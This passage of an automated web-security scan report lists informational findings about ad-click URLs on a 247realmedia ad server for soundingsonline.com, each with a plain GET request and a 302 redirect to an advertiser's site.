P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S
Content-Length: 401
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S">here</a>
...[SNIP]...

20.196. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1349609847/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1349609847/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1349609847/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1349609847/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:56:00 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 328
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&amp;i=2039">here</a>
...[SNIP]...

20.197. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1354223400/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1354223400/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1354223400/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1354223400/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:46:25 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 328
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&amp;i=2039">here</a>
...[SNIP]...

20.198. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1358228312/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1358228312/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1358228312/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1358228312/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:44:51 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 302
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

20.199. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1360801130/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1360801130/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1360801130/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1360801130/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:01:44 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.200. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1362847961/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1362847961/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1362847961/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1362847961/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:01:19 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 316
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

20.201. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1364011237/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1364011237/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1364011237/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.marinalife.com/soundings

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1364011237/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:53:59 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.marinalife.com/soundings
Content-Length: 311
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.marinalife.com/soundings">here</a>.<
...[SNIP]...

20.202. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1368942175/Right1/Dom_Ent/House-Sound-Btn/bs_de_ad_300x100.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1368942175/Right1/Dom_Ent/House-Sound-Btn/bs_de_ad_300x100.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1368942175/Right1/Dom_Ent/House-Sound-Btn/bs_de_ad_300x100.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.myonlinepubs.com/publication?i=59161

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1368942175/Right1/Dom_Ent/House-Sound-Btn/bs_de_ad_300x100.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:12:56 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.myonlinepubs.com/publication?i=59161
Content-Length: 323
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.myonlinepubs.com/publication?i=59161">here</a>
...[SNIP]...

20.203. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1373935794/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1373935794/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1373935794/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1373935794/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:59:30 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 299
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

20.204. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1379666529/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1379666529/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1379666529/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1379666529/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:56:23 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

20.205. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/138949847/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/138949847/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/138949847/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/138949847/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:54:45 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 302
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

20.206. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1392092493/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1392092493/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1392092493/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1392092493/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:55:23 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

20.207. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1398468739/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1398468739/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1398468739/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.marinalife.com/soundings

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1398468739/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:50:39 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.marinalife.com/soundings
Content-Length: 312
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.marinalife.com/soundings">here</a>.<
...[SNIP]...

20.208. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1399245462/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1399245462/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1399245462/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1399245462/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:11:50 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 303
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

20.209. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1415426878/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1415426878/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1415426878/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1415426878/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:42:31 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

